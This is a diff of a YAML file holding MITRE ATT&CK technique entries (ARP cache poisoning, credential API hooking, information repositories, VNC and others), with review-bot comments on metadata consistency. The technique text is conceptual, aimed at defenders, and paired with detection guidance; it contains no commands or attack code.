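Review bot: the new Customer Relationship Management Software entry (T1213.004) arrives with `x_mitre_detection: ''`, an empty string rather than an omitted key, alongside `atomic_tests: []`. Make sure whatever renders detection text for the index treats an empty string the same as a missing key, so no empty detection heading is emitted for this technique. Its placement between T1056 and T1557.002 matches the file's existing unsorted order, so there is no sorting concern.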
@@ -46123,7 +46721,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -46142,37 +46740,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
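Review bot: ARP Cache Poisoning (T1557.002) is the only technique in this patch left at `x_mitre_attack_spec_version: 2.1.0` (an unchanged context line) after its `spec_version` is removed and its `modified` moves back to 2022-07-22. That is internally consistent with an object upstream has not re-saved since then, but it is worth confirming the source bundle is a single intended ATT&CK release rather than a mix, since the other objects here carry 3.0.0 to 3.2.0. The T1213.003 description change only links `credentials` to Unsecured Credentials (T1552), with the version bump to 1.2 to match.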
@@ -46195,41 +46792,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
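Review bot: the contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into `Naveen Vijayaraghavan` and `Nilesh Dherange (Gurucul)`, so the affiliation now attaches to one name only; confirm that reflects upstream rather than a split-on-comma step in the generator, since other entries such as `Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)` keep a comma inside a single item. The expanded description also carries spaces before `\n` in several places (`(PII) \n\n`, `databases \n*`), which is upstream text and is likely why the dumper emits a double-quoted scalar instead of a `|-` block like the T1213.001 description; harmless, but trailing whitespace trimmed upstream would let it render as a readable block.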
@@ -46258,10 +46866,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
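Review bot: Replacing the `Office 365` and `Google Workspace` platforms with `Office Suite` (here and in the T1080 and T1550 hunks below) means any per-platform index keyed on the old platform names will no longer pick up these techniques; the platform-specific index CSVs should be regenerated in the same change so they do not drift from this file. The version bump to `3.4` is consistent with a platform change.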
@@ -46274,10 +46881,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -46286,11 +46903,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
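Review bot: The new `Cybernews Reuters Leak 2022` description has a stray space before the period in `Vilius Petkauskas .`; the other citations in this block use `Author. (date).` with no space, so this should be normalised (or fixed upstream if the generator copies it verbatim). Dropping `spec_version: '2.1'` is consistent with the same removal across the rest of the diff.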
@@ -46327,7 +46947,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
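Review bot: The `modified` timestamp for T1602.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-10-22T01:54:22.812Z`, and the same regression appears for T1563.001 (SSH Hijacking) further down (`2021-04-29` to `2020-03-23`). Every other technique in this diff moves forward to a 2024 date, so these two look like the generator picked up a stale or different source object; worth confirming before merging, since consumers may use `modified` to decide whether to refresh an entry.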
@@ -46359,115 +46979,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
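Review bot: The rewrite of T1056.004 removes `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) without a replacement, while the T1602.001 entry just above keeps its `x_mitre_permissions_required` block; if the field has been retired from the spec for this object, the removal is fine, otherwise it silently drops metadata. The rest of the T1056.004 change is a key reorder and citation reorder with the same content, so no concern there. In the new T1213.005 entry, the `Sentinel Labs NullBulge 2024` description starts with a leading space (`" Jim Walter."`) and the description body contains the literal `\ \n\n` sequence after `valuable information.`; both are upstream whitespace that should be stripped if the generator normalises other entries. `x_mitre_detection: ''` is empty for T1213.005, which matches the upstream object for a new sub-technique but means nothing will render in the detection section.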
@@ -46478,6 +47165,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -46487,7 +47175,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -46503,61 +47190,62 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
